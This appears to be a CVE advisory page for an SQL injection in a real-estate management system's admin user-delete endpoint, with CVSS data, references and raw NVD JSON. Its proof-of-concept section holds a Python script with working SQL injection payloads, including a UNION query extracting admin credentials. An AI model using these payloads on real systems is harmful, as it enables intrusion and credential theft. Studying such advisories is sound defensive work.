Security Vulnerability Report
CVE-2025-14900 CVSS 4.7 MEDIUM

CVE-2025-14900

Published: 2025-12-19 01:16:06
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in CodeAstro Real Estate Management System 1.0. Affected is an unknown function of the file /admin/userdelete.php of the component Administrator Endpoint. Manipulation of the argument ID leads to SQL injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Note: the score above is the Secondary (VulDB) CVSS 3.1 assessment; the raw JSON below also records the NVD Primary CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H with base score 7.2 (HIGH). Both vectors carry PR:H, meaning the attacker must already hold high privileges (per the description and PoC, an authenticated administrator session), which is the main factor keeping the severity below what an unauthenticated SQL injection would score.

Configurations (Affected Products)

cpe:2.3:a:codeastro:real_estate_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
CodeAstro Real Estate Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14900 PoC - CodeAstro Real Estate Management System SQL Injection # Target: /admin/userdelete.php # Vulnerability: SQL Injection via ID parameter target_url = "http://target-site.com/admin/userdelete.php" # Login to get admin session (required for exploitation) login_url = "http://target-site.com/admin/login.php" login_data = { "username": "admin", "password": "admin" } def exploit_sqli(target_url, session_cookie): """ SQL Injection payload examples: 1. Basic injection to confirm vulnerability 2. UNION-based injection to extract data 3. Time-based blind injection """ headers = {"Cookie": f"PHPSESSID={session_cookie}"} # Payload 1: Basic injection to confirm vulnerability payload_basic = "1' OR '1'='1" params = {"id": payload_basic} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Testing basic injection: {response.status_code}") # Payload 2: UNION-based injection to extract database version payload_union = "1' UNION SELECT NULL,version(),user(),database()-- -" params = {"id": payload_union} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Testing UNION injection: {response.status_code}") # Payload 3: Time-based blind injection payload_blind = "1' AND SLEEP(5)-- -" params = {"id": payload_blind} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Testing blind injection: {response.status_code}") # Payload 4: Extract admin credentials payload_creds = "1' UNION SELECT NULL,username,password,NULL FROM admin_users-- -" params = {"id": payload_creds} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Extracting admin credentials: {response.status_code}") return response.text if __name__ == "__main__": print("CVE-2025-14900 SQL Injection PoC") print("Target: CodeAstro Real Estate Management System 1.0") print("File: /admin/userdelete.php") # Usage instructions print("\n[!] 
This PoC requires authenticated admin session") print("[!] Replace 'target-site.com' with actual target")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14900", "sourceIdentifier": "[email protected]", "published": "2025-12-19T01:16:05.850", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in CodeAstro Real Estate Management System 1.0. Affected is an unknown function of the file /admin/userdelete.php of the component Administrator Endpoint. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:codeastro:real_estate_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "64EAEAD6-B0EE-4039-B827-3C243E2058F4"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/userdelete-sqli.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337425", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337425", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715672", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}